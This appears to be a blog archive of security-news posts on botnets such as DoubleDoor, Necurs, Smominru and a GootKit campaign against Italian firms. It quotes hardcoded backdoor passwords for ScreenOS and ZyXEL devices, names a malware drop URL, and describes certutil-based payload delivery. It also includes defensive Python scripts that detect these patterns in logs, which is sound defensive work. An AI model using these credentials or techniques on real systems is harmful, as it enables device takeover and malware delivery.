Category Archives: botnet

IoT botnet bypasses firewalls to get to ZyXEL modems

NewSky Security’s honeypots have detected a new IoT botnet in the making. The botnet was named DoubleDoor, as it leverages two distinct backdoors to get to the target: ZyXEL PK5001Z modems.

The DoubleDoor attacks

What’s interesting about this particular botnet is that it’s ready to pass an extra layer of security to get to the modem: Juniper Networks’ NetScreen hardware firewall devices. To pull off the attack, it employs exploits for two vulnerabilities: CVE-2015-7755, which …

What Is a Botnet?

Robot armies on the attack may sound like science fiction, but this is a security reality we’ve been facing for some time. You may have heard of recent threats where popular websites were knocked completely offline, or servers were forced to mine cryptocurrencies by giant “botnets”. But you might not have known exactly what a botnet is, and how the devices in your home could easily become part of one.

A botnet is a collection of connected devices, or “bots” (short for robots), that are infected and controlled by malware. These devices could include your PC, webcam, or any number of connected appliances in your home. The cybercriminals who distribute malware to create botnets are generally looking to use the combined computing power of all the infected devices to launch much larger attacks.

Take, for example, the Mirai botnet, which infected millions of consumer devices such as IP cameras and home routers to launch a distributed denial of service attack that was able to cripple major websites such as Netflix, Twitter, and Reddit. Mirai took advantage of the low level of security on most home connected devices. All the malware had to do was guess a password—many of which are known factory defaults—to seize control.

Botnets have been around for a long time, with the first instances recorded in the early 2000s as a way to send massive amounts of spam emails. But these days cybercriminals are eyeing the huge computing potential of millions of IoT devices to create botnets that can launch targeted attacks, or make money.

Some large botnets have become money-making enterprises unto themselves, with cybercrooks reselling their resources to users who want to launch their own attacks, say against online gaming rivals.

But, no matter what a botnet is used for there are a number of reasons why you don’t want your computers and devices to wind up as part of a nefarious network. Botnet malware can significantly slow down your computer or device, and keep it from functioning properly. In the case of computers, this slowdown can potentially keep you from downloading critical security updates, leaving you at an even greater risk for data theft. The malware can also be used to spam your friends and contacts in your name, and launch attacks against other networks, all without your knowledge.

Follow these important tips to keep your devices from joining the botnet army: 

  • Change Device Passwords—The first thing you want to do when you get a new IoT device is to change its default password, making it much harder for a potential attacker to gain access. Check your user’s manual for security settings. If the device has little or no built-in security, consider investing in more secure devices.
  • Keep your software up-to-date—This goes for both computer software and device firmware. Manufacturers regularly release software updates that can protect you from known vulnerabilities, so you want to make sure that you are always running the latest versions.
  • Always Use a Firewall—Firewalls monitor traffic between your Internet connection and your devices to detect unusual behavior. Even if one of your devices is infected, a firewall can keep a potential attacker from accessing all the other devices on the same network. Firewalls are often included in comprehensive security software, ensuring that all your computers and devices have protection.
  • Set Up a Separate IoT Network—Instead of putting all your IoT devices on your regular home network, consider setting up a guest network that doesn’t share access to your other devices and data. Check your router manufacturer’s website to learn how. Or, consider getting a router with built-in security features, making it easier to protect all the devices in your home from one access point.
  • Practice Safe Surfing—So-called “drive-by” malware, which can infect your device simply by visiting a compromised website or clicking on a dangerous ad, is being increasingly used to create botnets. In fact, millions of websites are now thought to be infected with crypto-mining malware. That’s why it’s important to be careful where you click. Make sure that you are using antivirus software, and that you enable ad blocking.

    And to prevent your computer from being infected with crypto mining software specifically, you may also consider installing a browser extension such as Chrome’s No Coin, or Opera for Android. Both actively block coin miners.

Looking for more mobile security tips and trends? Be sure to follow @McAfee Home on Twitter, and like us on Facebook.

The post What Is a Botnet? appeared first on McAfee Blogs.

DoubleDoor IoT Botnet Abuses Two Vulnerabilities to Circumvent Firewalls, Modems

The DoubleDoor Internet of Things (IoT) botnet circumvents firewall protection and other security measures by abusing two vulnerabilities. Detected by NewSky Security in its honeypot logs, DoubleDoor begins by deploying CVE-2015-7755. The vulnerability allows remote attackers to gain administrative access to ScreenOS, an operating system for Juniper Networks’ hardware firewall devices, by entering a hardcoded […]…

The post DoubleDoor IoT Botnet Abuses Two Vulnerabilities to Circumvent Firewalls, Modems appeared first on The State of Security.

Valentine’s Day malware surge is a test of corporate email defences

It may be a day for love and for lovers, but Valentine’s Day is also living up to expectations as a magnet for cybercriminal activity. Advising of an ongoing dating-spam campaign

The post Valentine’s Day malware surge is a test of corporate email defences appeared first on The Cyber Security Place.

DoubleDoor, a new IoT Botnet bypasses firewall using two backdoor exploits

Security researchers spotted a new IoT botnet dubbed DoubleDoor that is able to bypass firewall as well as modem security using two backdoor exploits.

IoT devices continue to be a privileged target of cyber criminals, and attacks against so-called smart objects have evolved rapidly. Security researchers at NewSky Security have detected a new IoT botnet dubbed DoubleDoor that is able to bypass firewall as well as modem security using two backdoor exploits.

The analysis of the honeypot logs allowed the researchers to detect the new threat; it leverages two known backdoor exploits to get past two levels of authentication.

The first malicious code is the Juniper Networks ScreenOS exploit; it triggers the flaw CVE-2015-7755 to bypass the firewall authentication.

CVE-2015-7755 is a hardcoded backdoor affecting the Juniper Networks ScreenOS software that powers its NetScreen firewalls.

“Essentially the telnet and SSH daemons of Netscreen firewalls can be accessed by using the hardcoded password <<< %s(un='%s') = %u with any username, regardless of it being valid or not. We saw its implementation in the initial attack cycle of DoubleDoor as it attacked our honeypots with username “netscreen” and the backdoor password.” wrote Ankit Anubhav, Principal Researcher, NewSky Security.

Once past the firewall, the malicious code uses the CVE-2016-10401 ZyXEL modem backdoor exploit to take full control of the IoT device.

The code is a privilege escalation exploit, “which is why the DoubleDoor attackers also performed a password based attack to get a basic privilege account like admin:CenturyL1nk before going for the superuser.”

“This time it was CVE-2016-10401, a backdoor for ZyXEL PK5001Z devices. This backdoor is straightforward too, with a hardcoded su password as zyad5001.” continues the expert.


The experts highlighted that differently from other IoT botnets like Satori or Masuta, the DoubleDoor botnet doesn’t use a unique string in the reconnaissance phase.

“after the threat actors have performed the attack, they want a confirmation whether they were successful of getting control of the IoT device. For this, they try to invoke the shell with invalid commands. If the attacker has succeeded, it will show “{string}: applet not found” where {string} is the invalid command.” observed the researchers.

“DoubleDoor botnet takes care of this, by using a randomized string in every attack”
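As an added illustration from the defender's side (this is example code, not tooling from NewSky Security or from the original post), the following Python script triages honeypot records for the indicators quoted above: the CVE-2015-7755 backdoor login, the admin:CenturyL1nk default credential, the CVE-2016-10401 su password, and the “applet not found” shell-confirmation probe. Because DoubleDoor randomizes the probe string, the rule keys on the BusyBox response shape rather than on any fixed string. The log format, timestamps and source addresses are constructed for this example and are not real traffic.

```python
import re
from collections import defaultdict

# Indicators quoted in the DoubleDoor write-up above (values taken from the text).
NETSCREEN_BACKDOOR_USER = "netscreen"
NETSCREEN_BACKDOOR_PASS = "<<< %s(un='%s') = %u"   # CVE-2015-7755 hardcoded password
ZYXEL_SU_BACKDOOR_PASS = "zyad5001"                # CVE-2016-10401 hardcoded su password
DEFAULT_ADMIN_CRED = ("admin", "CenturyL1nk")      # low-privilege default account
# BusyBox answers an unknown command with "<cmd>: applet not found"; DoubleDoor
# uses a random <cmd>, so we key on the response shape, not on any fixed string.
APPLET_NOT_FOUND = re.compile(r"^(?P<cmd>\S+): applet not found$")

# Constructed honeypot records for this example (not real traffic): one event per
# line, a timestamp followed by key="value" pairs. 203.0.113.0/24 and
# 198.51.100.0/24 are documentation address ranges.
SAMPLE_LOG = """\
2018-02-10T03:12:44Z src=203.0.113.7 user="netscreen" pass="<<< %s(un='%s') = %u" result="success"
2018-02-10T03:12:45Z src=203.0.113.7 cmd="kjhgfdsa" out="kjhgfdsa: applet not found"
2018-02-10T03:13:01Z src=203.0.113.7 user="admin" pass="CenturyL1nk" result="success"
2018-02-10T03:13:02Z src=203.0.113.7 cmd="su" pass="zyad5001" result="success"
2018-02-10T04:00:00Z src=198.51.100.9 user="root" pass="123456" result="fail"
2018-02-10T04:00:02Z src=198.51.100.9 cmd="ls" out="bin etc usr"
"""

FIELD = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')


def parse_record(line):
    """Split one log line into a dict; quoted values may contain spaces."""
    ts, _, rest = line.partition(" ")
    record = {"ts": ts}
    for key, quoted, bare in FIELD.findall(rest):
        record[key] = quoted if quoted else bare
    return record


def classify(record):
    """Return the indicator names that one record matches (possibly none)."""
    hits = []
    user, pw = record.get("user"), record.get("pass")
    cmd, out = record.get("cmd"), record.get("out", "")
    if user == NETSCREEN_BACKDOOR_USER or pw == NETSCREEN_BACKDOOR_PASS:
        hits.append("screenos_backdoor_login")
    probe = APPLET_NOT_FOUND.match(out)
    if probe and probe.group("cmd") == cmd:
        hits.append("shell_probe:" + cmd)   # the random string is reported, not matched
    if (user, pw) == DEFAULT_ADMIN_CRED:
        hits.append("default_credential_login")
    if cmd == "su" and pw == ZYXEL_SU_BACKDOOR_PASS:
        hits.append("zyxel_su_backdoor")
    return hits


# A source that shows all three stages has walked the whole DoubleDoor chain.
CHAIN = {"screenos_backdoor_login", "shell_probe", "zyxel_su_backdoor"}


def triage_honeypot(log_text):
    """Group hits per source address and flag sources that complete the chain."""
    per_src = defaultdict(list)
    for line in log_text.splitlines():
        if line.strip():
            record = parse_record(line)
            per_src[record["src"]].extend(classify(record))
    verdicts = {}
    for src, hits in per_src.items():
        kinds = {h.split(":", 1)[0] for h in hits}
        verdicts[src] = {"hits": hits, "doubledoor_chain": CHAIN <= kinds}
    return verdicts


if __name__ == "__main__":
    for src, verdict in triage_honeypot(SAMPLE_LOG).items():
        print(src, verdict)
```

The per-source grouping matters more than any single rule: a lone “applet not found” line is just someone mistyping in a shell, whereas the same source logging in with the ScreenOS backdoor credential, probing the shell and then switching to root with the ZyXEL su password is the sequence the researchers describe.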

The DoubleDoor botnet seems to be in an early stage; most of the attacks originate from South Korean IP addresses.

The botnet includes code to target only a limited set of devices: it will succeed only if the victim runs a specific unpatched version of the Juniper ScreenOS firewall protecting unpatched ZyXEL modems.

“Double layer of IoT protection is more common in corporate environments, which don’t rely on built-in IoT authentication and like to protect it with another layer of firewall. Although such corporate devices can be lesser in number, getting control of corporate environment routers can be more valuable for an attacker as it can lead to targeted IoT attacks.” concluded the experts.

Pierluigi Paganini

(Security Affairs – DoubleDoor, IoT botnet)

The post DoubleDoor, a new IoT Botnet bypasses firewall using two backdoor exploits appeared first on Security Affairs.

Necurs botnet is behind seasonal campaigns of Valentine’s Day-themed spam

The Necurs botnet made headlines again: the experts at the IBM X-Force research team observed a spike in seasonal campaigns of Valentine’s Day-themed spam emails.

The Necurs botnet made headlines again: the experts at the IBM X-Force research team observed a spike in the activity of the infamous botnet.

Necurs was inactive for a long period at the beginning of 2017 and resumed its activity in April 2017. In the past months the Necurs botnet has been used to push many other malware families, including Locky, Jaff, GlobeImposter, Dridex, Scarab and TrickBot.

Scammers are now using the Necurs botnet to send out an enormous number of messages offering companionship ahead of Valentine’s Day.

Crooks are using the spam messages to trick victims into sharing personal photos that are used later by cybercriminals to blackmail the victims.

According to the IBM X-Force team, the campaign started in mid-January and leverages the whole Necurs botnet, which is composed of 6 million bots.

“The current campaign from Necurs reached over 230 million spam messages within a matter of two weeks as the botnet spewed tens of millions of messages in two major bouts. The first surge started on Jan. 16 and ran through Jan. 18; the second started on Jan. 27 and died down on Feb. 3.” reads the analysis published by X-Force researchers.

The experts spotted two current campaigns that sent out a total of 230 million spam messages over a 14-day period.


The first campaign reached a peak between Jan. 16 and Jan. 18 and the second one began on Jan. 27 and lasted through Feb. 3. Researchers observed an average 30 million spam messages were sent each day.

“Looking at the messages being sent out in excess of 30 million emails a day, the current campaign delivers short email blurbs from supposed Russian women living in the U.S. While typical spam email is notorious for bad spelling and grammar, these samples are rather well-worded.” continues the analysis.

The experts determined that the spam messages are being sent from about 950,000 unique IP addresses. Most of the IPs are hosted in Vietnam and India, while the top sender IP address is hosted by a Pakistan-based ISP.

“Together, Vietnam and India hosted 55 percent of the IPs from which the spam originated. It’s worth noting that spammers constantly shuffle the resources they leverage and the originating IPs logged in one campaign are not likely to be used in the next one. This is how fraudsters avoid blacklists and blocking.” added the researchers.

After the takedowns of the Andromeda and Avalanche botnets, Necurs remains the largest spam distributor in the cybercrime ecosystem. Crooks will continue to leverage the Necurs botnet for their spam campaigns; for this reason, the most effective countermeasure is to increase employee awareness of this kind of threat.

 

Pierluigi Paganini

(Security Affairs – Necurs botnet, Valentine’s Day)

The post Necurs botnet is behind seasonal campaigns of Valentine’s Day-themed spam appeared first on Security Affairs.


IoTroop botnet: How to protect yourself from the cyber-storm of the century

The IoTroop botnet, which shares an extensive code base with the leaked Mirai source code, stands to cause even more damage than its predecessor. Almost one year ago exactly, computers across

The post IoTroop botnet: How to protect yourself from the cyber-storm of the century appeared first on The Cyber Security Place.

Android devices roped into new Monero-mining botnet

A new Monero-mining bot sprang up a few days ago and, in just a few days, has created a botnet consisting of over 7,000 Android devices, most of which are located in China (39%) and Korea (39%).

Spreading capabilities

The rise of the botnet has been flagged by researchers with Qihoo 360’s Netlab, who analyzed the mining malware and discovered that it has worm-like spreading capabilities. Once ADB.miner – as they’ve dubbed the threat – …

E Hacking News – Latest Hacker News and IT Security News: A New Botnet Targeting to Infect Android Devices with Malware that Mines the Monero Cryptocurrency

Another botnet showed up over the weekend on Saturday, February 3, focused entirely on Android devices exposing port 5555. On devices running the Android OS, that is the port used by the operating system's native Android Debug Bridge (ADB), a debugging interface that grants access to some of the operating system's most sensitive features.

The botnet scans for open debug ports so that it can infect victims with malware that mines the Monero cryptocurrency.

According to security researchers from Qihoo 360's Network Security Research Lab (Netlab), who discovered the botnet and named it ADB.miner, so far only devices running the Android OS, such as smartphones, smart TVs and TV set-top boxes, have been infected.

"The number of scan [sources] has doubled every 12 [hours]," said Yiming Gong, Director of the Network Security Research Lab at Qihoo 360. "We will see how big this botnet gets."


The botnet appears to be aggressive and keeps growing every day, with infected devices scanning the Internet for other victims. So far the botnet seems to have infected around 7,400 devices, according to Netlab.

Scanning for port 5555 recently shot to the #4 spot in Netlab's most-scanned ports, whereas previously it was not even in the top 10.

Most of the IP addresses scanning for other devices (meaning they are already infected) are located in China (~40%) and South Korea (~30%). Yiming added that the botnet has mostly infected "television related" devices rather than smartphones.

Netlab says ADB.miner reuses some of Mirai's port-scanning code, which marks the first time an Android malware strain has borrowed code from Mirai, a Linux-based malware family that previously targeted only networking and IoT devices.

The researchers have not yet given any details about the ADB vulnerability the attackers use to take control of devices, but they clarified that they do not believe the bug is specific to a particular vendor. This most likely implies that the bug affects the core of the Android ADB component itself.




The new gold rush: A look inside cryptocurrency fraud

Cybercriminals are flooding to the new world of cryptocurrencies looking to exploit the boom in interest and adoption of these electronic currencies, according to Digital Shadows. This new gold rush is creating a new frontier for professional cybercriminals moving away from less profitable techniques and exploits to make money on the back of the huge interest in these digital currencies. With over 1,400 cryptocurrencies in circulation, and new alternative coins – “altcoins” – emerging every …

A New Cryptomining Botnet Called Smominru Infected Over 500 Thousand Windows Machines

Security researchers from Proofpoint (a cybersecurity firm) have discovered that over 500 thousand Windows machines have been infected with cryptomining malware.

The post A New Cryptomining Botnet Called Smominru Infected Over 500 Thousand Windows Machines appeared first on Latest Hacking News.

Massive Smominru Cryptocurrency Botnet Rakes In Millions

Researchers say the Smominru threat actors control a 500,000-node botnet and are earning $8,500 daily by mining the Monero cryptocurrency.

Mining Smominru botnet used NSA exploit to infect more than 526,000 systems

Researchers from Proofpoint discovered a huge botnet dubbed ‘Smominru’ that is using the EternalBlue exploit to infect Windows computers and recruit them in Monero cryptocurrency mining activities.

The number of cyber attacks against the cryptocurrency sector keeps growing, and malware writers are focusing their efforts on the development of cryptocurrency-miner malware.

Recently, security experts observed cryptocurrency miners leveraging the NSA EternalBlue SMB exploit (CVE-2017-0144) as a spreading mechanism.

In August 2017, a new fileless miner dubbed CoinMiner appeared in the wild; it uses the NSA EternalBlue exploit and the WMI tool to spread.

Now researchers from Proofpoint have discovered a huge botnet dubbed ‘Smominru’ (aka Ismo) that is using the EternalBlue exploit (CVE-2017-0144) to infect Windows computers and recruit them into Monero cryptocurrency mining activities.

“Because obtaining these cryptocurrencies through legitimate mining mechanisms is quite resource-intensive, cybercriminals are stealing them, demanding ransomware payments in them, and harnessing other computers to mine them for free. Recently, Proofpoint researchers have been tracking the massive Smominru botnet, the combined computing power of which had earned millions of dollars for its operators.” states the analysis published by Proofpoint.

With the help of Abuse.ch and the Shadowserver Foundation, Proofpoint conducted a sinkholing operation that allowed them to profile the botnet.

The command and control infrastructure of the Smominru botnet is hosted on the DDoS protection service SharkTech; Proofpoint promptly reported the abuse to the service provider but received no response.

According to the researchers, the Smominru botnet has been active at least since May 2017 and has already infected more than 526,000 Windows computers.

Most of the infected systems are servers distributed worldwide, with the largest numbers in Russia, India, and Taiwan. It is a profitable business: the operators had already mined approximately 8,900 Monero ($2,346,271 at the current rate).

“Based on the hash power associated with the Monero payment address for this operation, it appeared that this botnet was likely twice the size of Adylkuzz,” the researchers said. “The operators had already mined approximately 8,900 Monero (valued this week between $2.8M and $3.6M). Each day, the botnet mined roughly 24 Monero, worth an average of $8,500 this week (Figure 2).”


The researchers at Proofpoint discovered that the crooks are using at least 25 hosts to scan the Internet for EternalBlue-vulnerable Windows computers, and that they also leverage the NSA EsteemAudit exploit (CVE-2017-0176) to compromise target machines.

The machines all appear to sit behind the autonomous system AS63199; further technical details and the IoCs are included in the analysis published by Proofpoint.

“Because most of the nodes in this botnet appear to be Windows servers, the performance impact on potentially critical business infrastructure may be high, as can the cost of increased energy usage by servers running much closer to capacity. The operators of this botnet are persistent, use all available exploits to expand their botnet, and have found multiple ways to recover after sinkhole operations.” concluded Proofpoint.

“Given the significant profits available to the botnet operators and the resilience of the botnet and its infrastructure, we expect these activities to continue, along with their potential impacts on infected nodes. We also expect botnets like that described here to become more common and to continue growing in size.”

 

Pierluigi Paganini

(Security Affairs – Smominru botnet, Monero)

The post Mining Smominru botnet used NSA exploit to infect more than 526,000 systems appeared first on Security Affairs.

Cryptocurrency Mining Malware Infected Over Half-Million PCs Using NSA Exploit

2017 was the year of high-profile data breaches and ransomware attacks, but since the beginning of this year we have been noticing a faster-paced shift in the cyber threat landscape, as cryptocurrency-related malware is becoming a popular and profitable choice of cyber criminals. Several cybersecurity firms are reporting new cryptocurrency mining viruses that are being spread using EternalBlue—the

Smart Homes May Hide Crypto Mining Schemes

Loosely attended smart home appliances may be platforms for cryptocurrency mining scams, a researcher with the firm IOActive warns. Is your smart refrigerator or connected dishwasher secretly mining Monero or Bitcoin? It’s a possibility that experts at the firm IOActive say homeowners, regulators and device makers need to be...

New Rapidly-Spreading Hide and Seek IoT Botnet Identified by Bitdefender

Bitdefender has identified a new fast-spreading IoT botnet called Hide and Seek that has the potential to perform information theft for espionage or extortion. Bitdefender security researchers have spotted a fast-spreading, shape-shifting new botnet that can hack IoT devices and potentially perform widespread information theft for espionage or...

Security Affairs: Italian companies and Ministry of the Interior under attack, experts spotted a huge botnet

Threat actors with deep knowledge of the Italian fiscal ecosystem are using a huge botnet to target Italian companies and the Ministry of the Interior.

On February 18 a colleague of mine (Luca) called me to tell me that a malicious email was targeting Italian companies. This was the beginning of a new analysis adventure that Luca and I ran together.

The email pretended to be sent by the “Ministero dell’Economia e delle Finanze”, the Italian Department of Treasury, and it had clever subjects such as:

    • Codici Tributo Acconti
    • F24 Acconti-Codice Tributo 4034

The attacker knows the Italian fiscal calendar very well, since those forms are heavily used by company administration employees at that time of year. The attacker probably chose this lure to reach as many companies as possible. The email address was not coming from the “Ministero dell’Economia e delle Finanze” at all; it was coming from the following addresses:

    • info@amber-kate.com
    • info@fallriverproductions.com

The email looks like this:

Figure: Malicious eMail (Huge Botnet Attacking Italian Companies)

A simple link pointing to a high-reputation domain opened the default browser and downloaded the following JavaScript file. The heavy obfuscation and the way the content was delivered were suspicious enough to be worth following up with an analysis.

 
Figure: Infection: Stage 1 Obfuscated

After a deobfuscation pass, the JavaScript is much easier for a human to read.

 
Figure: Infection: Stage 1 Clear Text

A classic “drop and execute” section follows. A GET request to 239outdoors.com/themes5.php drops a file named 1t.exe, and later on the same script executes the dropped file. 1t.exe runs on the victim machine and contacts the command and control server, waiting for further commands.

The new sample looks like GootKit, a weaponized version of banker malware. The malware installs itself and contacts the command and control server asking “what to do”, sending the “stolen credentials” directly to that server. Details on IPs, persistence and so on are provided in the IoC section, but today we won’t describe GootKit: we got access to the dropping site!

We want to figure out whether we can help victims deactivate the malicious botnet by providing as many details as possible, without focusing on reversing the malware itself, since it appears to be already known.

By further analyzing the dropping website we immediately understood that the same URL was dropping another threat. The parallel threat the dropping website was spreading was called “Nuovo Documento 2008”, and it was a .bat file, as follows.

 
Figure: New Threat Stage 1

On the first stage, that .bat file opens a browser pointing to a legitimate image, but later on it uses a well-known technique called “certutil for delivery of file” to drop and execute another file. This technique is well described here by carnal0wnage. Basically, the attacker uses the certutil.exe program to download a Base64-encoded payload, decode it and run it. The technique is very quiet: the User-Agent of certutil.exe is not suspicious, because the tool legitimately needs to connect outside the company network to check certificates, so few IPS rules cover it. The dropped file, named unslss.exe, appears to be very close to the previously analyzed one (1t.exe): it contacts the same C&C and behaves in a similar way.

Again, we won’t focus on reversing the malware; rather, we want to collect as many IoCs as possible to protect as many victims as possible. By analyzing the dropping website we found that a significant number of connections had additional referrers, so we decided to focus on how many DNS names were pointing to that domain. The result was quite impressive (please see the Dropping URLs IoC section).
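As an added example (not the authors' own tooling, and not part of the original analysis), here is how an endpoint detection can catch the certutil delivery step described above. Since the download itself looks like a legitimate certificate fetch on the wire, the signal lives in process command-line telemetry rather than in network rules. The script reads Sysmon-style JSON-line process-creation events, flags certutil.exe invoked with its -urlcache download switch or its -decode switch, and marks a host on which a decode follows a download within a short window. The events, hostnames, paths and the example.invalid URL are constructed placeholders; the dropped file name unslss.exe is the one reported in the text.

```python
import json
import re
from datetime import datetime, timedelta

# Constructed process-creation events in a Sysmon-like JSON-lines shape (not real
# telemetry). Hostnames, paths and the URL are placeholders for this example.
SAMPLE_EVENTS = r"""
{"ts":"2018-02-19T09:14:03Z","host":"WS-ADMIN-07","image":"C:\\Windows\\System32\\certutil.exe","parent":"C:\\Windows\\System32\\cmd.exe","cmdline":"certutil.exe -urlcache -split -f http://example.invalid/doc.txt C:\\Users\\Public\\doc.txt"}
{"ts":"2018-02-19T09:14:05Z","host":"WS-ADMIN-07","image":"C:\\Windows\\System32\\certutil.exe","parent":"C:\\Windows\\System32\\cmd.exe","cmdline":"certutil.exe -decode C:\\Users\\Public\\doc.txt C:\\Users\\Public\\unslss.exe"}
{"ts":"2018-02-19T10:02:11Z","host":"SRV-PKI-01","image":"C:\\Windows\\System32\\certutil.exe","parent":"C:\\Windows\\System32\\mmc.exe","cmdline":"certutil.exe -verify -urlfetch C:\\Temp\\issued.cer"}
{"ts":"2018-02-19T11:30:40Z","host":"DEV-BUILD-02","image":"C:\\Windows\\System32\\certutil.exe","parent":"C:\\Windows\\System32\\cmd.exe","cmdline":"certutil.exe -decode C:\\build\\blob.b64 C:\\build\\blob.bin"}
{"ts":"2018-02-19T11:31:00Z","host":"DEV-BUILD-02","image":"C:\\Windows\\System32\\notepad.exe","parent":"C:\\Windows\\explorer.exe","cmdline":"notepad.exe C:\\build\\notes.txt"}
"""

# certutil accepts switches with either prefix; compare case-insensitively.
DOWNLOAD_SWITCHES = {"-urlcache", "/urlcache"}
DECODE_SWITCHES = {"-decode", "/decode"}
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)


def parse_events(text):
    """One JSON object per non-empty line, in file order."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def basename(path):
    """Last path component, lower-cased, for either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify_event(event):
    """Return indicator names for a single process-creation event."""
    if basename(event["image"]) != "certutil.exe":
        return []
    args = set(event["cmdline"].lower().split())
    hits = []
    if DOWNLOAD_SWITCHES & args:
        url = URL_RE.search(event["cmdline"])
        hits.append("certutil_download" + (":" + url.group(0) if url else ""))
    if DECODE_SWITCHES & args:
        hits.append("certutil_decode")
    return hits   # "-verify -urlfetch" (a normal chain check) produces no hit


def triage_certutil(text, window=timedelta(minutes=5)):
    """Collect hits per host; a decode within `window` of a download is the drop chain."""
    findings = {}
    last_download = {}
    for event in parse_events(text):
        hits = classify_event(event)
        if not hits:
            continue
        host = event["host"]
        ts = datetime.strptime(event["ts"], "%Y-%m-%dT%H:%M:%SZ")
        entry = findings.setdefault(host, {"hits": [], "drop_chain": False})
        entry["hits"].extend(hits)
        if any(h.startswith("certutil_download") for h in hits):
            last_download[host] = ts
        if "certutil_decode" in hits and host in last_download \
                and ts - last_download[host] <= window:
            entry["drop_chain"] = True
    return findings


if __name__ == "__main__":
    for host, finding in triage_certutil(SAMPLE_EVENTS).items():
        print(host, finding)
```

The PKI server's -verify -urlfetch invocation is deliberately included as the benign case: that is the outbound certificate-checking traffic the text mentions, and it is why a network-only rule on certutil's User-Agent produces noise. The image basename check is the weak point of this rule; real telemetry should also compare Sysmon's OriginalFileName field so that a renamed copy of certutil.exe is still caught.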

Following the research on the dropping website, we found an interesting log of all the connections coming from possible victims. We collected that log and built the following list of possible infections (possible victims). We won’t publish the victims’ IP addresses, but if you can prove you are authorized by your company to ask for those logs, we can give you (for free, of course) the IP addresses we found related to your company. A detailed list of possibly infected networks follows.

Possible Victims:

  • ACI informatica s.p.a.
  • AGOS-AS
  • AGSM Verona Spa
  • ASGARR Consortium GARR
  • Acantho S.p.a
  • Alfanews S.r.l.
  • Ambrogio s.r.l.
  • Asco TLC S.p.A.
  • Autostrade-as
  • BT Italia
  • BT Italia S.p.A.
  • Banca Monte Dei Paschi Di Siena S.P.A.
  • Brennercom S.p.A.
  • COLT Technology Services Group Limited
  • Camera dei deputati
  • Cesena Net srl
  • Clouditalia Telecomunicazioni S.p.A.
  • Comune Di Brescia
  • Comune di Bologna
  • Consortium GARR
  • Consorzio per il Sistema Informativo
  • Costacrociere-as
  • Duebite-as
  • E4A s.r.l.
  • Energente S.r.l.
  • FASTNET SpA
  • FASTWEB SPA
  • FINECO Banca del Gruppo Unicredit
  • Fastweb
  • Forcepoint Cloud Ltd
  • GenyCommunications
  • Global Com Basilicata s.r.l.
  • H3G Italy
  • Hynet S.R.L.
  • IBSNAZ
  • ICT Valle Umbra s.r.l.
  • InAsset S.r.l.
  • InfoCamere SCpA
  • Infracom Italia S.p.A.
  • Inrete s.r.l
  • Insiel- Informatica per il sistema degli enti loca
  • Integrys.it di Stefania Peragna impresa individual
  • Intred S.p.A.
  • KPNQWest Italia S.p.a.
  • LEPIDA
  • Lepida S.p.A.
  • Liguria Digitale S.C.p.A.
  • Linea Com S R L
  • Linkem spa
  • Lombardia Informatica S.p.A.
  • Mandarin S.p.A.
  • Mc-link SpA
  • Metrolink S.R.L.
  • Ministero dell’Interno
  • Mnet srl
  • NGI SpA
  • Nemo S.r.l.
  • Nordcom S.p.a.
  • Officine Informatiche Srl
  • Progetto Evo S.r.l.
  • Provincia di Reggio nell’Emilia
  • Qcom spa
  • Raiffeisen OnLine GmbH
  • Regione Basilicata
  • Regione Toscana
  • Regione Veneto
  • STI ADSL
  • Sardegnait-as
  • Societa’ Gestione Servizi Bp S.p.A.
  • TELEX S.r.l.
  • TWT S.p.A.
  • Telecom Italia
  • Terra S.p.a.
  • Time-net S.r.l.
  • Tiscali SpA
  • Trenitalia SpA
  • Trentino Network S.r.l.
  • Universita’ degli Studi di Milano
  • Venis S.p.A.
  • Videotime SPA
  • Vodafone Group Services GmbH
  • Vodafone Italia DSL
  • Vodafone Omnitel B.V.
  • Vodafone Omnitel N.v.
  • WIIT S.p.A.
  • Welcome Italia S.p.A
  • Wind Telecomunicazioni
  • Wind Telecomunicazioni SpA

Following are the IoCs found during this long “analysis journey”. I ran this analysis overnight, so I am sure there will be some imprecisions, but I preferred to speed up the whole analysis process to give everyone the opportunity to block this infamous threat as soon as possible.

Hope it helps the community.

IoC:

  • eMail:
  • info@amber-kate.com
  • info@fallriverproductions.com
  • Dropping URLS:
  • Command and Controls
  • Hashes

The original post was published by Marco Ramilli on his blog at the following URL:

Huge Botnet Attacking Italian Companies

About the author: Marco Ramilli, Founder of Yoroi

I am a computer security scientist with an intensive hacking background. I have an MD in computer engineering and a PhD in computer security from the University of Bologna. During my PhD program I worked for the US Government (at the National Institute of Standards and Technology, Security Division), where I did intensive research in malware evasion techniques and penetration testing of electronic voting systems.


I have experience in security testing, since I have been performing penetration testing on several US electronic voting systems. I’ve also been in charge of testing the uVote voting system for the Italian Ministry of Homeland Security. I met Palantir Technologies, where I was introduced to the Intelligence Ecosystem. I decided to broaden my cyber security experience by diving into SCADA security issues with some of the biggest industrial agglomerates in Italy. I finally decided to found Yoroi: an innovative Managed Cyber Security Service Provider developing one of the most amazing cyber security defence centers I’ve ever experienced! Now I technically lead Yoroi, defending our customers and strongly believing in: Defence Belongs To Humans

Edited by Pierluigi Paganini

(Security Affairs – botnet, hacking)

The post Italian companies and Ministry of the Interior under attack, experts spotted a huge botnet appeared first on Security Affairs.

What has the Necurs botnet been up to?

The Necurs botnet has been slowly growing since late 2012 and still tops the list of largest spam botnets in the world. Since then, the botnet has occasionally stopped or temporarily minimized the sending out of spam but has returned in full force. How big is the Necurs botnet? It’s difficult to say precisely, but the latest information provided by the Cisco Talos team can give a general idea. The researchers analyzed 32 distinct spam … More

Satori variant hacks into mining rigs, steals ETH by replacing wallet address

Qihoo 360 Netlab researchers warn about a new variant of the Satori malware that apparently goes after ether (ETH) mining rigs. The malware, dubbed Satori.Coin.Robber, started to reestablish the Satori botnet

The post Satori variant hacks into mining rigs, steals ETH by replacing wallet address appeared first on The Cyber Security Place.

Satori IoT Botnet Exploits Zero-Day to Zombify Huawei Routers

Although the original creators of the infamous IoT malware Mirai have already been arrested and sent to jail, the variants of the notorious botnet are still in the game due to the availability of its source code on the Internet. Hackers have widely used the infamous IoT malware to quietly amass an army of unsecured internet-of-things devices, including home and office routers, that could be

Coprocessor Attacks: the Hidden Threat

Botnets, DDoS and ransomware attacks, vulnerabilities in Internet of Things devices and Open Source Software, and the generally poor state of information security, dominate the discussion of cybersecurity. These same

The post Coprocessor Attacks: the Hidden Threat appeared first on The Cyber Security Place.

